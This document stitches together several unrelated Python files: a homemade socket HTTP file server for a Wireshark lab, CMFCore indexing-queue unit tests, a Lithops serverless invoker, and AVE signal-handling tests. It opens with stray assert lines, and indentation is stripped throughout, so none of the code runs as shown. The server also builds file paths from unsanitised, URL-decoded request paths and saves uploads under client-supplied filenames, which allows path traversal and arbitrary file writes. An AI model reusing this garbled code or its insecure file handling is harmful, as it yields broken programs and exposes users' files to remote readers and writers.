assert codes[429] == 4, codes
assert codes[202] == 6, codes
|
http_server.py
|
'''
author: g-tmp
base on python3/http.server
'''
import os
import io
import sys
import socket
import html
import urllib.parse
import mimetypes
import time
import threading
class File(object):
def get_filesize(self,file):
size_unit = ['b','K','M','G','T']
try:
size = os.path.getsize(file)
except OSError as e:
raise e
i = 0
while size/1000 >= 1:
size = float(size) / 1000
i += 1
return '%.1f %s' % (size , size_unit[i])
# file last modify time
def get_filemtime(self,file):
stime = time.localtime(os.path.getmtime(file))
ftime = time.strftime('%Y-%m-%d %H:%M:%S',stime)
return ftime
# OK = 200
# NOT_FOUND = 404
# MOVED_PERMANENTLY = 301
class HTTPRequestHandler(object):
"""
"""
def __init__(self):
self.HOME = os.environ['HOME']
def parse_request(self,request):
status_line = request.split('\r\n')[0]
method = status_line.split()[0]
path = urllib.parse.unquote(status_line.split()[1])
return (method,path)
def make_header(self,state_code,path=None,body_length=0):
server = "XD"
date = ''
if state_code == 200:
if path is None:
header = 'HTTP/1.1 200 OK\r\nContent-Type: %s\r\nServer: %s\r\n\r\n' % ('text/html',server)
return header
if os.path.isdir(path) and not path.rstrip().endswith('/'):
return self.make_header(301,path)
content_type = self.guess_type(path)
header = 'HTTP/1.1 200 OK\r\nContent-Type: %s\r\nContent-Length: %d\r\nServer: %s\r\n\r\n' % (content_type,body_length,server)
elif state_code == 404:
header = 'HTTP/1.1 404 Not Found\r\nContent-Type: text/html;charset=utf-8\r\nContent-Length: %d\r\nServer: %s\r\nConnection: close\r\n\r\n' % (body_length , server)
elif state_code == 301:
if not path.rstrip().endswith('/'):
location = path + '/'
header = 'HTTP/1.1 301 Moved Permanently\r\nLocation: %s\r\nServer: %s\r\n\r\n' % (location,server)
else:
return None
return header
def list_directory(self,path):
'''
path is the REAL filesystem path.
If path is a file, return None;
if path is a directory, list its files and return the listing page as bytes.
'''
try:
lists = os.listdir(path)
except OSError as e:
# path is not a directory
return None
os.chdir(path) # change directory for upload files
logic_path = path.replace(self.HOME,'')
r = []
enc = sys.getfilesystemencoding()
title = 'Directory listing for %s ' % logic_path
r.append('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">')
r.append('<html>\n<head>')
r.append('<meta http-equiv="Content-Type" content="text/html; charset=%s">' % enc)
r.append('<title>%s</title>\n</head>' % logic_path)
r.append('<body>\n<h1>%s</h1>' % title)
r.append('<form method="POST" enctype="multipart/form-data">')
# r.append('<input type="text" name="p1" required="required"> >>')
r.append('<input type="file" name="file" > >>')
r.append('<button type="submit">Upload</button></form>')
r.append('<hr>\n<ul>')
try:
r.append('<a href="%s">Parent Directory</a>' % logic_path[0:logic_path[0:-1].rindex('/')+1])
except Exception as e:
r.append('/')
lists.sort(key=lambda a:a.lower())
for name in lists:
fullname = os.path.join(path,name)
displayname = linkname = name
if os.path.isdir(fullname):
displayname = name + "/"
linkname = name + "/"
if os.path.islink(fullname):
displayname = name + "@"
r.append('<li><a href="%s">%s</a></li>' %
(urllib.parse.quote(linkname, errors='surrogatepass'),  # %xx-escape characters such as '#', ' ' and '?' in the URL
html.escape(displayname, quote=False))  # convert &, < and > to HTML-safe sequences
)
r.append('</ul>\n<hr>\n</body>\n</html>\n')
encode = '\n'.join(r).encode(enc)  # encode to bytes so the page can be sent straight over the socket
# f = io.BytesIO()
# f.write(encode)
# f.seek(0)
return encode # bytes-like object
def translate_path(self,path):
# path = path.split('?',1)[0]
# path = path.split('#',1)[0]
real_path = self.HOME + path
# print('real_path ',real_path)
return real_path
def guess_type(self,path):
if os.path.isdir(path):
return "text/html;charset=utf-8"
content_type = mimetypes.guess_type(path)[0]
return content_type
def read_file(self,path):
buffer = []
fd = None
try:
fd = open(path,'rb')
# return fd.read()
while True:
line = fd.read(4096)
if not line :
break
buffer.append(line)
buffer = b''.join(buffer)
return buffer # byte array
# no such file
except IOError as e:
raise e
finally:
if fd:
fd.close()
def do_GET(self,connection_socket,path):
html = self.list_directory(path)
response = ''
if html is None:
# is a file
size = os.path.getsize(path)
outputdata = self.read_file(path)
header = self.make_header(200,path,size)
response = header.encode() + outputdata
else:
# is a directory
header = self.make_header(200,path,len(html))
response = header.encode() + html
self.send_response(connection_socket,response)
def do_POST(self,connection_socket,request):
content_len = int(request.split('Content-Length: ')[1].split('\r\n')[0])
body = connection_socket.receive_upload(content_len)
# print("len : "+len(body))
# print(body)
connection_socket.upload(body)
header = self.make_header(200)
html = '''\
<TITLE>Upload page for TCP Ethereal Lab</TITLE>
<body bgcolor="#FFFFFF">
<p><font face="Arial, Helvetica, sans-serif" size="4"> Congratulations! <br> </font>
<P><font face="Arial, Helvetica, sans-serif"> You've now transferred a copy of alice.txt from your computer to
XD. You should now stop Wireshark packet capture. It's time to start analyzing the captured Wireshark packets! </font>
</FORM>
'''
response = header.encode('utf-8') + html.encode('utf-8')
self.send_response(connection_socket,response)
def send_response(self,connection_socket,response):
connection_socket.send(response)
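# For reference, a sketch of what make_header produces (note this server
# never fills in a Date header):
#
# handler = HTTPRequestHandler()
# print(handler.make_header(404, body_length=23))
# # HTTP/1.1 404 Not Found
# # Content-Type: text/html;charset=utf-8
# # Content-Length: 23
# # Server: XD
# # Connection: close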
class MySocket(object):
"""
- coded for clarity, not efficiency
"""
def __init__(self, sock = None):
if sock is None:
self.__socket = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
else:
self.__socket = sock
def server_bind(self,host='',port=8000):
self.__socket.bind((host,port))
self.__socket.listen(5)
print("server listening %d <3" % port)
def server_accept(self):
return self.__socket.accept()
def getaddress(self):
return self.__socket.getsockname()
def send(self,msg):
# totalsent = 0
# while totalsent < MSGLEN:
# sent = self.__socket.send(msg[bytes_sent:])
# if sent == 0:
# raise RuntimeError("socket connection broken")
# bytes_sent += sent
return self.__socket.send(msg)
def receive(self):
# chunks = []
# totalrecd = 0 # have received how many bytes
# while totalrecd < MSGLEN:
# chunk = self.__socket.recv(min(MSGLEN - totalrecd , 2048))
# if chunk == b'':
# raise RuntimeError("socket connection broken")
# chunks.append(chunk)
# totalrecd += len(chunk)
# return b''.join(chunks)
return self.__socket.recv(4096)
def receive_upload(self,msglen):
chunks = []
bytes_recvd = 0
while bytes_recvd < msglen:
chunk = self.__socket.recv(min(msglen - bytes_recvd, 16 * 1024))
if chunk == b'':
raise RuntimeError("socket connection broken")
bytes_recvd += len(chunk)
chunks.append(chunk)
return b''.join(chunks)
def upload(self,body):
part = body.split(b"\r\n\r\n")
part_fields = part[0].split(b"\r\n")
WebKitFormBoundary = part_fields[0]
content_disposition = part_fields[1].split(b' ')
filename = str(part_fields[1].split(b'; ')[-1].split(b'=')[-1].replace(b'"',b'')).replace("'","")
content_type = part_fields[2].split(b"Content-Type: ")[-1]
# print(part_fields[1])
data = part[-1].split(WebKitFormBoundary)[0]
# print(type(filename),filename)
try:
with open(filename,'wb') as fd:
fd.write(data)
except IOError as e:
raise e
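# The multipart/form-data body that ``upload`` parses is assumed to look
# like this sketch (boundary and filename are placeholders):
#
#   ------WebKitFormBoundaryAbC123\r\n
#   Content-Disposition: form-data; name="file"; filename="alice.txt"\r\n
#   Content-Type: text/plain\r\n
#   \r\n
#   <raw file bytes>\r\n
#   ------WebKitFormBoundaryAbC123--\r\n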
def close(self):
if self.__socket:
self.__socket.close()
def shutdown(self):
self.__socket.shutdown(socket.SHUT_RDWR)
request_handler = HTTPRequestHandler()
def run(connection_socket,addr):
connection_socket = MySocket(connection_socket)
try:
# while True:
raw = connection_socket.receive()
# print(raw)
request = raw.decode('utf-8')
(method , logic_path ) = request_handler.parse_request(request)
real_path = request_handler.translate_path(logic_path)
response = ''
print(method + "\t" + logic_path)
# print(request)
# print(len(request))
if method == "GET":
request_handler.do_GET(connection_socket,real_path)
elif method == "POST":
request_handler.do_POST(connection_socket,request)
except KeyboardInterrupt as e:
print("Keyboard Interrupt")
except IOError as e:
html = '<br /><font color="red" size="7">404 Not Found!</font>'
header = request_handler.make_header(404,body_length=len(html))
response = header.encode() + html.encode()
connection_socket.send(response)
finally:
# print("------- request ------- ")
# print(request)
# connection_socket.shutdown()
connection_socket.close()
def start():
welcome_socket = MySocket()
try:
port = int(sys.argv[1])
welcome_socket.server_bind(port=port)
except IndexError as e:
welcome_socket.server_bind()
while True:
connection_socket,addr = welcome_socket.server_accept()
print(addr)
# connection_socket.settimeout(60)
t = threading.Thread(target=run , args=(connection_socket,addr))
t.start()
welcome_socket.close()
if __name__ == '__main__':
start()
|
test_CatalogIndexing.py
|
# -*- coding: utf-8 -*-
from Acquisition import Implicit
from Products.CMFCore.indexing import getQueue
from Products.CMFCore.indexing import INDEX
from Products.CMFCore.indexing import IndexQueue
from Products.CMFCore.indexing import QueueTM
from Products.CMFCore.indexing import REINDEX
from Products.CMFCore.indexing import UNINDEX
from Products.CMFCore.interfaces import IIndexing
from Products.CMFCore.interfaces import IIndexQueue
from Products.CMFCore.interfaces import IIndexQueueProcessor
from Products.CMFCore.tests.base.dummy import DummyContent
from Products.CMFCore.tests.base.dummy import DummyFolder
from threading import currentThread
from threading import Thread
from time import sleep
from transaction import savepoint, commit, abort
from unittest import TestCase
from zope.component import provideUtility
from zope.interface import implementer
from zope.testing.cleanup import CleanUp
@implementer(IIndexing)
class MockIndexer(object):
def __init__(self):
self.queue = []
def index(self, obj, attributes=None):
self.queue.append((INDEX, obj, attributes))
def reindex(self, obj, attributes=None):
self.queue.append((REINDEX, obj, attributes))
def unindex(self, obj):
self.queue.append((UNINDEX, obj, None))
@implementer(IIndexQueue)
class MockQueue(MockIndexer):
processed = None
def hook(self):
pass
def index(self, obj, attributes=None):
super(MockQueue, self).index(obj, attributes)
self.hook()
def reindex(self, obj, attributes=None, update_metadata=1):
super(MockQueue, self).reindex(obj, attributes)
self.hook()
def unindex(self, obj):
super(MockQueue, self).unindex(obj)
self.hook()
def getState(self):
return list(self.queue) # better return a copy... :)
def setState(self, state):
self.queue = state
def optimize(self):
pass
def process(self):
self.processed = self.queue
self.clear()
return len(self.processed)
def clear(self):
self.queue = []
@implementer(IIndexQueueProcessor)
class MockQueueProcessor(MockQueue):
state = 'unknown'
def begin(self):
self.state = 'started'
def commit(self):
self.state = 'finished'
def abort(self):
self.clear()
self.state = 'aborted'
class QueueTests(CleanUp, TestCase):
def setUp(self):
self.queue = IndexQueue()
def tearDown(self):
self.queue.clear()
def testInterface(self):
self.assertTrue(IIndexQueue.providedBy(self.queue))
def testQueueHook(self):
class CaptainHook(object):
def __init__(self):
self.hooked = 0
def __call__(self):
self.hooked += 1
hook = CaptainHook()
queue = self.queue
queue.setHook(hook)
self.assertEqual(hook.hooked, 0)
queue.index('foo')
queue.reindex('foo')
queue.reindex('bar')
self.assertEqual(len(queue.getState()), 3)
self.assertEqual(hook.hooked, 3)
self.assertEqual(queue.process(), 2)
self.assertEqual(hook.hooked, 3)
def testQueueState(self):
queue = self.queue
queue.index('foo')
self.assertEqual(queue.getState(), [(INDEX, 'foo', None, None)])
state = queue.getState()
queue.reindex('bar')
self.assertEqual(queue.getState(),
[(INDEX, 'foo', None, None),
(REINDEX, 'bar', None, 1)])
queue.setState(state)
self.assertEqual(queue.getState(), [(INDEX, 'foo', None, None)])
self.assertEqual(queue.process(), 1)
def testQueueProcessor(self):
queue = self.queue
proc = MockQueueProcessor()
provideUtility(proc, IIndexQueueProcessor)
queue.index('foo')
self.assertEqual(queue.process(), 1) # also do the processing...
self.assertEqual(queue.getState(), [])
self.assertEqual(proc.getState(), [(INDEX, 'foo', [])])
# the real queue won't update the state...
self.assertEqual(proc.state, 'started')
queue.commit()
self.assertEqual(proc.state, 'finished')
def testMultipleQueueProcessors(self):
queue = self.queue
proc1 = MockQueueProcessor()
proc2 = MockQueueProcessor()
provideUtility(proc1, IIndexQueueProcessor, name='proc1')
provideUtility(proc2, IIndexQueueProcessor, name='proc2')
queue.index('foo')
self.assertEqual(queue.process(), 1) # also do the processing...
self.assertEqual(queue.getState(), [])
self.assertEqual(proc1.getState(), [(INDEX, 'foo', [])])
self.assertEqual(proc2.getState(), [(INDEX, 'foo', [])])
self.assertEqual(proc1.state, 'started') # the real queue won't...
self.assertEqual(proc2.state, 'started') # update the state...
queue.commit()
self.assertEqual(proc1.state, 'finished')
self.assertEqual(proc2.state, 'finished')
def testQueueOperations(self):
queue = self.queue
proc = MockQueueProcessor()
provideUtility(proc, IIndexQueueProcessor)
queue.index('foo')
queue.reindex('foo')
self.assertEqual(queue.process(), 1)
self.assertEqual(queue.getState(), [])
self.assertEqual(proc.getState(), [(INDEX, 'foo', [])])
# the real queue won't update the state
self.assertEqual(proc.state, 'started')
queue.commit()
self.assertEqual(proc.state, 'finished')
def testQueueOptimization(self):
queue = self.queue
queue.index('foo')
queue.reindex('foo')
queue.unindex('foo')
queue.index('foo', 'bar')
queue.optimize()
self.assertEqual(queue.getState(), [(INDEX, 'foo', [], None)])
def testCustomQueueOptimization(self):
def optimize(self):
self.setState([op for op in self.getState() if not
op[0] == UNINDEX])
queue = self.queue
queue.index('foo')
queue.reindex('foo')
queue.unindex('foo')
queue.index('foo', 'bar')
queue.optimize()
self.assertEqual(queue.getState(), [(INDEX, 'foo', [], None)])
queue.clear()
# hook up the custom optimize
orig_optimize = queue.optimize
try:
queue.optimize = optimize
queue.index('foo')
queue.reindex('foo')
queue.unindex('foo')
queue.index('foo', 'bar')
queue.optimize(queue)
self.assertEqual(queue.getState(),
[(INDEX, 'foo', None, None),
(REINDEX, 'foo', None, 1),
(INDEX, 'foo', 'bar', None)])
finally:
queue.optimize = orig_optimize
def testQueueAbortBeforeProcessing(self):
queue = self.queue
proc = MockQueueProcessor()
provideUtility(proc, IIndexQueueProcessor)
queue.index('foo')
queue.reindex('foo')
self.assertNotEqual(queue.getState(), [])
queue.abort()
self.assertEqual(queue.process(), 0) # nothing left...
self.assertEqual(queue.getState(), [])
self.assertEqual(proc.getState(), [])
self.assertEqual(proc.state, 'aborted')
def testQueueAbortAfterProcessing(self):
queue = self.queue
proc = MockQueueProcessor()
provideUtility(proc, IIndexQueueProcessor)
queue.index('foo')
queue.reindex('foo')
self.assertEqual(queue.process(), 1)
self.assertNotEqual(proc.getState(), [])
queue.abort()
self.assertEqual(queue.getState(), [])
self.assertEqual(proc.getState(), [])
self.assertEqual(proc.state, 'aborted')
    def testOptimizeQueue(self):
queue = self.queue
queue.setState([(REINDEX, 'A', None, 1), (REINDEX, 'A', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(REINDEX, 'A', [], 1)])
queue.setState([(INDEX, 'A', None, 1), (REINDEX, 'A', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(INDEX, 'A', [], 1)])
queue.setState([(INDEX, 'A', None, None), (UNINDEX, 'A', None, None)])
queue.optimize()
self.assertEqual(queue.getState(), [])
queue.setState([(UNINDEX, 'A', None, None), (INDEX, 'A', None, None)])
queue.optimize()
self.assertEqual(queue.getState(), [(REINDEX, 'A', [], None)])
def testOptimizeQueueWithAttributes(self):
queue = self.queue
queue.setState([(REINDEX, 'A', None, 1),
(REINDEX, 'A', ('a', 'b'), 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(REINDEX, 'A', [], 1)])
queue.setState([(REINDEX, 'A', ('a', 'b'), 1),
(REINDEX, 'A', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(REINDEX, 'A', [], 1)])
queue.setState([(REINDEX, 'A', ('a', 'b'), 1),
(REINDEX, 'A', ('b', 'c'), 1)])
queue.optimize()
self.assertEqual(queue.getState(),
[(REINDEX, 'A', ['a', 'b', 'c'], 1)])
queue.setState([(INDEX, 'A', None, None), (REINDEX, 'A', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(INDEX, 'A', [], 1)])
queue.setState([(REINDEX, 'A', ('a', 'b'), 1),
(UNINDEX, 'A', None, None),
(INDEX, 'A', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(), [(REINDEX, 'A', [], 1)])
def testOptimizeQueueSortsByOpcode(self):
queue = self.queue
queue.setState([(INDEX, 'C', None, 1), (UNINDEX, 'B', None, None)])
queue.optimize()
self.assertEqual(queue.getState(),
[(UNINDEX, 'B', [], None), (INDEX, 'C', [], 1)])
queue.setState([(REINDEX, 'A', None, 1), (UNINDEX, 'B', None, None)])
queue.optimize()
self.assertEqual(queue.getState(),
[(UNINDEX, 'B', [], None), (REINDEX, 'A', [], 1)])
queue.setState([(REINDEX, 'A', None, 1),
(UNINDEX, 'B', None, None),
(INDEX, 'C', None, 1)])
queue.optimize()
self.assertEqual(queue.getState(),
[(UNINDEX, 'B', [], None),
(REINDEX, 'A', [], 1),
(INDEX, 'C', [], 1)])
class QueueThreadTests(TestCase):
""" thread tests modeled after zope.thread doctests """
def setUp(self):
self.me = getQueue()
self.assertTrue(IIndexQueue.providedBy(self.me),
'non-queued indexer found')
def tearDown(self):
self.me.clear()
def testLocalQueues(self):
me = self.me # get the queued indexer...
other = []
def runner(): # a callable for the thread to run...
me.reindex('bar')
other[:] = me.getState()
thread = Thread(target=runner) # another thread is created...
thread.start() # and started...
        while thread.is_alive():
pass # wait until it's done...
self.assertEqual(other, [(REINDEX, 'bar', None, 1)])
self.assertEqual(me.getState(), [])
me.index('foo') # something happening on our side...
self.assertEqual(other, [(REINDEX, 'bar', None, 1)])
self.assertEqual(me.getState(), [(INDEX, 'foo', None, None)])
thread.join() # finally the threads are re-united...
def testQueuesOnTwoThreads(self):
me = self.me # get the queued indexer...
first = []
def runner1(): # and callables for the first...
me.index('foo')
first[:] = me.getState()
thread1 = Thread(target=runner1)
second = []
def runner2(): # and second thread
me.index('bar')
second[:] = me.getState()
thread2 = Thread(target=runner2)
self.assertEqual(first, []) # clean table before we start...
self.assertEqual(second, [])
self.assertEqual(me.getState(), [])
thread1.start() # do stuff here...
sleep(0.01) # allow thread to do work
self.assertEqual(first, [(INDEX, 'foo', None, None)])
self.assertEqual(second, [])
self.assertEqual(me.getState(), [])
thread2.start() # and there...
sleep(0.01) # allow thread to do work
self.assertEqual(first, [(INDEX, 'foo', None, None)])
self.assertEqual(second, [(INDEX, 'bar', None, None)])
self.assertEqual(me.getState(), [])
thread1.join() # re-unite with first thread and...
        me.unindex('f00')  # let something happen on our side
self.assertEqual(first, [(INDEX, 'foo', None, None)])
self.assertEqual(second, [(INDEX, 'bar', None, None)])
self.assertEqual(me.getState(), [(UNINDEX, 'f00', None, None)])
thread2.join() # also re-unite the second and...
        me.unindex('f00')  # let something happen again...
self.assertEqual(first, [(INDEX, 'foo', None, None)])
self.assertEqual(second, [(INDEX, 'bar', None, None)])
self.assertEqual(me.getState(),
[(UNINDEX, 'f00', None, None),
(UNINDEX, 'f00', None, None)])
def testManyThreads(self):
me = self.me # get the queued indexer...
queues = {} # container for local queues
def makeRunner(name, idx):
def runner():
for n in range(idx): # index idx times
me.index(name)
queues[currentThread()] = me.queue
return runner
threads = []
for idx in range(99):
threads.append(Thread(target=makeRunner('t%d' % idx, idx)))
for thread in threads:
thread.start()
sleep(0.01) # just in case
for thread in threads:
thread.join()
for idx, thread in enumerate(threads):
tid = 't%d' % idx
queue = queues[thread]
names = [name for op, name, attrs, metadata in queue]
self.assertEqual(names, [tid] * idx)
class QueueTransactionManagerTests(TestCase):
def setUp(self):
self.queue = MockQueueProcessor()
self.tman = QueueTM(self.queue)
self.queue.hook = self.tman.register # transaction manager hook
def testFlushQueueOnCommit(self):
self.queue.index('foo')
commit()
self.assertEqual(self.queue.getState(), [])
self.assertEqual(self.queue.processed, [(INDEX, 'foo', None)])
self.assertEqual(self.queue.state, 'finished')
def testFlushQueueOnAbort(self):
self.queue.index('foo')
abort()
self.assertEqual(self.queue.getState(), [])
self.assertEqual(self.queue.processed, None)
self.assertEqual(self.queue.state, 'aborted')
def testUseSavePoint(self):
self.queue.index('foo')
savepoint()
self.queue.reindex('bar')
commit()
self.assertEqual(self.queue.getState(), [])
self.assertEqual(self.queue.processed,
[(INDEX, 'foo', None),
(REINDEX, 'bar', None)])
self.assertEqual(self.queue.state, 'finished')
def testRollbackSavePoint(self):
self.queue.index('foo')
sp = savepoint()
self.queue.reindex('bar')
sp.rollback()
commit()
self.assertEqual(self.queue.getState(), [])
self.assertEqual(self.queue.processed, [(INDEX, 'foo', None)])
self.assertEqual(self.queue.state, 'finished')
class FakeFolder(Implicit):
id = 'portal'
def getPhysicalPath(self):
return ('portal',)
class UnindexWrapperTests(TestCase):
def setUp(self):
self.root = FakeFolder()
self.root.sub1 = DummyFolder('sub1')
self.root.sub1.testcontent = DummyContent('testcontent')
self.root.sub1.testcontent.title = 'Test Title'
def test_wrap_content(self):
from Products.CMFCore.indexing import wrap
unwrapped = self.root.sub1.testcontent
wrapped = wrap(unwrapped)
        self.assertEqual(unwrapped.getPhysicalPath()[-1], 'testcontent')
self.assertEqual(unwrapped.getPhysicalPath(),
wrapped.getPhysicalPath())
self.assertEqual(hash(unwrapped), hash(wrapped))
self.assertEqual(unwrapped.Title(), wrapped.Title())
# change the id of our test content, which changes getPhysicalPath
# All other attributes/methods remain unchanged
unwrapped.id = 'test2'
        self.assertEqual(unwrapped.getPhysicalPath()[-1], 'test2')
self.assertNotEqual(unwrapped.getPhysicalPath(),
wrapped.getPhysicalPath())
self.assertEqual(hash(unwrapped), hash(wrapped))
self.assertEqual(unwrapped.Title(), wrapped.Title())
|
invoker.py
|
#
# (C) Copyright IBM Corp. 2019
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import logging
import multiprocessing as mp
from types import SimpleNamespace
from concurrent.futures import ThreadPoolExecutor
from lithops.serverless import ServerlessHandler
from lithops.invokers import JobMonitor
from lithops.storage import InternalStorage
from lithops.version import __version__
from lithops.utils import iterchunks
from lithops.config import extract_serverless_config, extract_storage_config
logger = logging.getLogger(__name__)
def function_invoker(job_payload):
if __version__ != job_payload['lithops_version']:
raise Exception("WRONGVERSION", "Lithops version mismatch",
__version__, job_payload['lithops_version'])
log_level = logging.getLevelName(logger.getEffectiveLevel())
custom_env = {'LITHOPS_WORKER': 'True',
'PYTHONUNBUFFERED': 'True'}
os.environ.update(custom_env)
config = job_payload['config']
num_invokers = job_payload['invokers']
invoker = ServerlessInvoker(config, num_invokers, log_level)
invoker.run(job_payload)
class ServerlessInvoker:
"""
    Class responsible for performing the invocations against the serverless compute backend
"""
def __init__(self, config, num_invokers, log_level):
self.config = config
self.num_invokers = num_invokers
self.log_level = log_level
storage_config = extract_storage_config(self.config)
self.internal_storage = InternalStorage(storage_config)
self.remote_invoker = self.config['lithops'].get('remote_invoker', False)
self.rabbitmq_monitor = self.config['lithops'].get('rabbitmq_monitor', False)
if self.rabbitmq_monitor:
self.rabbit_amqp_url = self.config['rabbitmq'].get('amqp_url')
self.num_workers = self.config['lithops'].get('workers')
logger.info('Total workers: {}'.format(self.num_workers))
serverless_config = extract_serverless_config(self.config)
self.serverless_handler = ServerlessHandler(serverless_config, storage_config)
self.token_bucket_q = mp.Queue()
self.pending_calls_q = mp.Queue()
self.job_monitor = JobMonitor(self.config, self.internal_storage, self.token_bucket_q)
def _invoke(self, job, call_ids_range):
"""
Method used to perform the actual invocation against the Compute Backend
"""
data_byte_ranges = [job.data_byte_ranges[int(call_id)] for call_id in call_ids_range]
payload = {'config': self.config,
'chunksize': job.chunksize,
'log_level': self.log_level,
'func_key': job.func_key,
'data_key': job.data_key,
'extra_env': job.extra_env,
'execution_timeout': job.execution_timeout,
'data_byte_ranges': data_byte_ranges,
'executor_id': job.executor_id,
'job_id': job.job_id,
'job_key': job.job_key,
'call_ids': call_ids_range,
'host_submit_tstamp': time.time(),
'lithops_version': __version__,
'runtime_name': job.runtime_name,
'runtime_memory': job.runtime_memory,
'worker_processes': job.worker_processes}
# do the invocation
start = time.time()
activation_id = self.serverless_handler.invoke(job.runtime_name,
job.runtime_memory,
payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
        if not activation_id:
            self.pending_calls_q.put((job, call_ids_range))
            return
        logger.info('ExecutorID {} | JobID {} - Function invocation '
                    '{} done! ({}s) - Activation ID: {}'.
                    format(job.executor_id, job.job_id, call_ids_range,
                           resp_time, activation_id))
        return call_ids_range
def run(self, job_payload):
"""
        Run a job described in job_payload
"""
job = SimpleNamespace(**job_payload)
job.total_calls = len(job.call_ids)
logger.info('ExecutorID {} | JobID {} - Starting function '
'invocation - Total: {} activations'
.format(job.executor_id, job.job_id, job.total_calls))
logger.info('ExecutorID {} | JobID {} - Chunksize:'
' {} - Worker processes: {}'
.format(job.executor_id, job.job_id,
job.chunksize, job.worker_processes))
for i in range(self.num_workers):
self.token_bucket_q.put('#')
for call_ids_range in iterchunks(job.call_ids, job.chunksize):
self.pending_calls_q.put((job, call_ids_range))
self.job_monitor.start_job_monitoring(job)
invokers = []
for inv_id in range(self.num_invokers):
p = mp.Process(target=self._run_process, args=(inv_id, ))
p.daemon = True
p.start()
invokers.append(p)
for p in invokers:
p.join()
def _run_process(self, inv_id):
"""
Run process that implements token bucket scheduling approach
"""
logger.info('Invoker process {} started'.format(inv_id))
call_futures = []
with ThreadPoolExecutor(max_workers=250) as executor:
# TODO: Change pending_calls_q check
while self.pending_calls_q.qsize() > 0:
self.token_bucket_q.get()
job, call_ids_range = self.pending_calls_q.get()
future = executor.submit(self._invoke, job, call_ids_range)
call_futures.append(future)
logger.info('Invoker process {} finished'.format(inv_id))
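# The invoker above combines two queues: pending_calls_q holds the work units
# and token_bucket_q holds permits bounding the number of in-flight
# invocations (the JobMonitor is handed token_bucket_q above, presumably to
# return tokens as activations complete). A minimal, self-contained sketch of
# that token-bucket pattern (illustration only, not part of Lithops):
def _token_bucket_sketch(max_in_flight=2, calls=('c1', 'c2', 'c3', 'c4')):
    tokens = mp.Queue()
    pending = mp.Queue()
    for _ in range(max_in_flight):
        tokens.put('#')  # one token per allowed concurrent invocation
    for call in calls:
        pending.put(call)
    while pending.qsize() > 0:
        tokens.get()  # blocks until an invocation slot is free
        call = pending.get()
        logger.debug('invoking %s', call)
        tokens.put('#')  # here a monitor would return the token on completion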
|
hickup.py
|
#coding=utf8
# Copyright (C) 2013 Sony Mobile Communications AB.
# All rights, including trade secret rights, reserved.
import os
import time
import glob
import json
import signal
from ave.network.exceptions import *
from ave.network.control import RemoteControl
from ave.network.connection import *
from ave.network.process import Process
import setup
def wait_hickup_dir(path, timeout):
limit = time.time() + timeout
while True:
if time.time() > limit:
return False
if os.path.isdir(path):
return True
time.sleep(0.5)
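# For reference, the trace-dumping behaviour exercised below could be
# implemented with a SIGUSR1 handler along these lines. This is only a
# sketch: the real handler lives in ave.network.process, and the exact file
# name format here is an assumption based on the checks in t02 (date,
# process name and pid must all appear in the name).
def _example_sigusr1_handler(signum, frame):
    import traceback
    hickup_dir = os.path.join(os.path.expanduser('~'), '.ave', 'hickup')
    if not os.path.isdir(hickup_dir):
        os.makedirs(hickup_dir)
    name = '%s-ExampleProcess-%d' % (time.strftime('%Y%m%d.%H%M%S'), os.getpid())
    with open(os.path.join(hickup_dir, name), 'w') as f:
        traceback.print_stack(frame, file=f)
# such a handler would be installed with:
#     signal.signal(signal.SIGUSR1, _example_sigusr1_handler)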
# check that signalling a control process does not kill it
@setup.factory()
def t01(pretty, factory):
ctrl = factory.make_control(home=factory.HOME.path)
pid = ctrl.get_pid()
os.kill(pid, signal.SIGUSR1)
try:
pid = ctrl.get_pid()
    except ConnectionClosed as e:
print('FAIL %s: SIGUSR1 killed the process: %s' % (pretty, e))
return False
    except Exception as e:
print('FAIL %s: unknown error: %s' % (pretty, e))
return False
return True
# check that trace files are written to <home>/.ave/hickup with predictable
# file names
@setup.factory()
def t02(pretty, factory):
ctrl = factory.make_control(home=factory.HOME.path)
pid = ctrl.get_pid()
os.kill(pid, signal.SIGUSR1)
hickup_dir = os.path.join(factory.HOME.path, '.ave', 'hickup')
# signal handler runs asynchronously. allow for time to pass before failing
if not wait_hickup_dir(hickup_dir, 3):
print('FAIL %s: hickup dir not created' % pretty)
return False
# expect to find a file whose name includes todays date, the name of the
# signalled process and the process' pid. don't bother with high clock
# resolution in the date check. do note that the test *can* fail if run
    # very close to midnight
files = glob.glob(os.path.join(hickup_dir, '*'))
date = time.strftime('%Y%m%d')
if len(files) != 1:
print('FAIL %s: wrong number of files: %s' % (pretty, files))
return False
if date not in files[0]:
print('FAIL %s: date not in file name: %s' % (pretty, files[0]))
return False
if 'MockControl' not in files[0]:
print('FAIL %s: process name not in file name: %s' % (pretty, files[0]))
return False
if str(pid) not in files[0]:
print('FAIL %s: pid not in file name: %s' % (pretty, files[0]))
return False
return True
# check that the signal is propagated to children
@setup.factory()
def t03(pretty, factory):
ctrl = factory.make_control(home=factory.HOME.path)
pid = ctrl.get_pid()
ctrl.make_child()
os.kill(pid, signal.SIGUSR1)
path = os.path.join(factory.HOME.path, '.ave', 'hickup')
wait_hickup_dir(path, 3)
files = glob.glob(os.path.join(path, '*'))
if len(files) != 2:
print('FAIL %s: wrong number of files: %s' % (pretty, files))
return False
return True
# check that the signal is not propagated to non-ave processes such as external
# tools. these will otherwise terminate if they do not handle the signal.
@setup.factory()
def t04(pretty, factory):
ctrl = factory.make_control(home=factory.HOME.path)
pid = ctrl.get_pid()
cport, cpid = ctrl.make_child()
remote = RemoteControl(('',cport), None, None)
exe = os.path.join(os.path.dirname(__file__),'hickup_catch_sigusr1')
remote.run_external([exe, factory.HOME.path], __async__=True)
time.sleep(1)
